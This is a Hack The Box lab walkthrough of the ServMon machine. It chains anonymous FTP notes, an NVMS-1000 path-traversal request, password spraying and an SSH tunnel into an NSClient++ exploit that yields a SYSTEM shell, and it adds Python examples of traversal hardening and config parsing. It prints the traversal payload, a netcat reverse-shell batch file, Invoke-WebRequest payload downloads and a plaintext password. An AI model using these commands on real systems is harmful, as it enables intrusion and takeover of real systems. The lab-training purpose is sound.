Hack The Box - ServMon


ServMon starts with anonymous FTP access that lets me read two users' notes. One of the notes hints that a password list sits on a user's desktop. The box also hosts NVMS-1000, which is vulnerable to a path traversal attack that I use to retrieve that password list. A password spray with those passwords gives me a foothold over SSH. On the machine, the NSClient++ config file holds a set of credentials, and with them I can use a public NSClient++ exploit to get an interactive shell as NT AUTHORITY\SYSTEM.

Skills Learned

  • Directory/Path Traversal
  • NVMS-1000 exploitation
  • NSClient++ exploitation
  • Port Forwarding/Tunneling




→ root@iamf «servmon» «»
$ nmap -sC -sV -oA nmap/initial-servmon ''
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|_    refox/68.0
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -28s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-12T16:27:15
|_  start_date: N/A

RPC (135), NetBIOS (139) and SMB (445) are the usual ports on a Windows box. Besides these standard ports, there are some less common services:

  • FTP with anonymous login on port 21,
  • SSH on port 22 (OpenSSH for Windows),
  • an HTTP service on port 80 that redirects to Pages/login.htm,
  • an HTTPS service on the non-standard port 8443 whose title identifies it as NSClient++. Port 5666, shown as tcpwrapped, is the default NRPE port, which fits an NSClient++ install.

There is no Kerberos (88) or LDAP (389) in the scan, so this machine is probably a standalone host rather than a domain controller.


TCP 21 - FTP

21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users

Based on the nmap scan, the FTP root directory contains a Users folder. Inside it I found two subfolders, Nathan and Nadine. Each contains a text file, and I copied both to my machine.

The first file is Confidential.txt. It contains a note from Nadine to Nathan.


I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.



The second file is Notes to do.txt. It contains a to do list.

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

I'll note that there's a Passwords.txt on Nathan's desktop, and that items 3 to 5 of the to do list are still open: the passwords haven't been uploaded yet and NVMS is still publicly accessible.

TCP 445 - SMB

Anonymous login is not allowed, so nothing to see here.

TCP 80 - Website

Visiting port 80 redirects me to a login page at Pages/login.htm, which belongs to NVMS-1000.

A Google search shows that NVMS-1000 is CCTV monitoring software from TVT. I can't find any default credentials, and the common ones don't work.


A quick search on exploit-db shows it is vulnerable to Directory Traversal.

PoC: https://www.exploit-db.com/exploits/47774

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html


GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close


; for 16-bit app support
[mci extensions]

The PoC doesn't specify an affected version, but I'll give it a try.
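
The PoC above is a single raw request, so to see what the bug actually is, here is an added example that is not part of the original writeup or of NVMS-1000: a vulnerable path resolver that behaves like the PoC implies (the decoded URL path is appended to the web root and normalised), next to a hardened one that decodes once, normalises, and then checks that the result is still inside the web root. The web root path is an assumption for illustration; the traversal string is the one from the PoC. ntpath is used so the Windows path semantics hold wherever you run it.

```python
import ntpath
from urllib.parse import unquote

# Hypothetical web root for the NVMS-1000 web UI. The real install path is not
# shown in the writeup; this value is an assumption used only for illustration.
WEBROOT = r"C:\Program Files\NVMS-1000\Web"

# Request path taken from the public PoC (exploit-db 47774).
POC_PATH = "/../../../../../../../../../../../../windows/win.ini"


def vulnerable_resolve(webroot: str, url_path: str) -> str:
    """Mimic a server that appends the decoded URL path straight onto its web root.

    ntpath.normpath collapses the '..' segments, so the request walks out of the
    web root and ends up pointing at an arbitrary file on the same drive.
    """
    rel = unquote(url_path).replace("/", "\\")
    return ntpath.normpath(webroot + rel)


def safe_resolve(webroot: str, url_path: str):
    """Resolve url_path under webroot; return None if it would escape the root."""
    root = ntpath.normpath(webroot)
    rel = unquote(url_path).replace("/", "\\").lstrip("\\")
    # Refuse drive-qualified paths (C:\...) smuggled in as the request path.
    if ntpath.splitdrive(rel)[0]:
        return None
    candidate = ntpath.normpath(ntpath.join(root, rel))
    # Containment check after normalisation; case-insensitive because NTFS is.
    inside = (candidate.lower() == root.lower()
              or candidate.lower().startswith(root.lower() + "\\"))
    return candidate if inside else None


def is_traversal_attempt(url_path: str) -> bool:
    """Detection helper for access logs: True when the path would leave the web root."""
    return safe_resolve(WEBROOT, url_path) is None
```

The same `safe_resolve` check doubles as a log filter: any request path for which it returns None is a traversal attempt, including percent-encoded variants such as `%2e%2e/`. It decodes only once, as a server would; a server that decodes twice needs a second `unquote` before the check.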

TCP 8443 - NSClient++



It took ages to load every page on this site. A quick Google search shows that NSClient++ is another monitoring agent (for Nagios). Adding 'exploit' to the search pops up an Exploit-DB entry for NSClient++.


Shell as nadine

I've added htb.servmon to my /etc/hosts so it resolves to the target's IP. I know htb.servmon looks weird, but that's me in the past, hehe.

NVMS-1000 Directory Traversal - Obtain Passwords.txt

I started Burp Suite and sent the traversal request from the PoC against NVMS-1000 from Repeater. Burp sends the path exactly as typed, which matters here: browsers and curl without --path-as-is normalise the ../ segments away before the request ever leaves the client.

It returns the Passwords.txt from Nathan's desktop, a list of passwords.


Password spraying

I created a usernames list and a password list:

  • users.txt

  • passwords.txt


With these, I can password spray the SMB service using CrackMapExec. It hits on the pair nadine:L1k3B1gBut7s@W0rk, a local account (SERVMON\nadine).

→ root@iamf «servmon» «»
$ crackmapexec smb htb.servmon -u users.txt -p passwords.txt
SMB    445    SERVMON          [+] SERVMON\nadine:L1k3B1gBut7s@W0rk 

SSH access

The credentials also work on SSH.

→ root@iamf «servmon» «»
$ ssh nadine@htb.servmon


Privilege Escalation

Shell as SYSTEM

Obtain NSClient++ password

3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Recalling the to do list from the earlier enumeration ("Lock down the NSClient Access - Complete"), I looked at the NSClient++ configuration in its default installation folder and found the web interface password there.

PS C:\> gc 'Program Files\NSClient++\nsclient.ini'


I'll try the scripted PoC. Before that, I need to tunnel the connection: the config restricts NSClient++'s allowed hosts to localhost, so requests coming from my own IP are refused and I can't run the exploit directly from outside.
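
The two facts that drive the rest of the attack (the password and the allowed-hosts restriction) both live in nsclient.ini, so here is an added example, not part of the original writeup or of NSClient++, that parses a constructed excerpt of that file and decides whether an exploit can be sent directly or has to go through a tunnel that ends on the target's loopback. The section and key names (`[/settings/default]`, `allowed hosts`, `password`, `[/modules]`) follow the NSClient++ ini layout; the password value is the one passed to the exploit later on this page; the attacker IP and the other entries are assumptions.

```python
import configparser
import ipaddress
from typing import Dict, List

# Constructed excerpt standing in for C:\Program Files\NSClient++\nsclient.ini.
# Section and key names follow the NSClient++ ini layout; the password is the
# value the writeup later passes to the exploit, everything else is illustrative.
SAMPLE_NSCLIENT_INI = """\
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = ew2x6SsGTxjRwXOT
"""


def parse_nsclient_ini(text: str) -> Dict[str, object]:
    """Pull the web password, allowed hosts and enabled modules out of nsclient.ini."""
    cp = configparser.ConfigParser(interpolation=None)  # passwords may contain '%'
    cp.optionxform = str  # keep module names case-sensitive
    cp.read_string(text)
    default = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    # NSClient++ defaults allowed hosts to 127.0.0.1 when the key is absent.
    hosts_raw = default.get("allowed hosts", "127.0.0.1")
    allowed = [h.strip() for h in hosts_raw.split(",") if h.strip()]
    modules: List[str] = []
    if cp.has_section("/modules"):
        modules = [name for name, state in cp.items("/modules")
                   if state.lower() in ("enabled", "1", "true")]
    return {"password": default.get("password", ""),
            "allowed_hosts": allowed,
            "modules": modules}


def host_allowed(allowed_hosts: List[str], client_ip: str) -> bool:
    """Does client_ip fall inside any 'allowed hosts' entry (single IP or CIDR)?"""
    ip = ipaddress.ip_address(client_ip)
    for entry in allowed_hosts:
        try:
            if ip in ipaddress.ip_network(entry, strict=False):
                return True
        except ValueError:
            continue  # hostname entries would need DNS; skipped in this offline example
    return False


def needs_tunnel(info: Dict[str, object], attacker_ip: str) -> bool:
    """True when the request must arrive on the target's loopback (e.g. via ssh -L)."""
    return not host_allowed(info["allowed_hosts"], attacker_ip)


if __name__ == "__main__":
    cfg = parse_nsclient_ini(SAMPLE_NSCLIENT_INI)
    print("web password:", cfg["password"])
    print("modules:", ", ".join(cfg["modules"]))
    # 10.10.14.5 is an assumed attacker IP; the writeup's address is not shown.
    print("tunnel required from 10.10.14.5:", needs_tunnel(cfg, "10.10.14.5"))
```

`needs_tunnel` is the check behind the SSH tunnel that follows: with `allowed hosts = 127.0.0.1` the only source address NSClient++ will accept is its own loopback, which is exactly where an `ssh -L` forward terminates.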

SSH Tunneling

SSH local port forwarding lets me reach a port on ServMon's loopback interface through a port on my own machine. For this, I open a second SSH session used only for the tunnel.

→ root@iamf «servmon» «»
$ ssh -L 8443: nadine@ 

-L 8443: means that any connection to port 8443 on my localhost is carried through the SSH session and delivered to port 8443 on ServMon's own loopback. NSClient++ therefore sees the request coming from 127.0.0.1, so its allowed-hosts check passes. Now I can run the exploit against my localhost.

NSClient++ Exploit PoC

First, I'll create a batch file called reverse.bat on my machine.

@echo off

C:\Temp\nc.exe 443 -e powershell.exe

Once created, I'll transfer the file to C:\temp\ on ServMon via a Python HTTP server, along with netcat for Windows (nc.exe). On Python 3 the equivalent server is python3 -m http.server 80.

→ root@iamf «servmon» «»
$ python -m SimpleHTTPServer 80

Fetch the hosted files on ServMon:

PS C:\> Invoke-webrequest -uri -outfile C:/temp/reverse.bat
PS C:\> Invoke-webrequest -uri -outfile C:/temp/nc.exe

Now I'll set up a listener on my Kali box.

→ root@iamf «servmon» «»
$ nc -nlvvp 443

Then I run the exploit and wait on my listener.

→ root@iamf «servmon» «»
$ python3 nsRCE.py -t -P 8443 -p 'ew2x6SsGTxjRwXOT' -c "c:\temp\reverse.bat"

Now I have an interactive shell as NT AUTHORITY\SYSTEM. The public PoC uses the web interface password to register the batch file as an external script and have NSClient++ run it, and because the NSClient++ service runs as SYSTEM, so does the shell it spawns.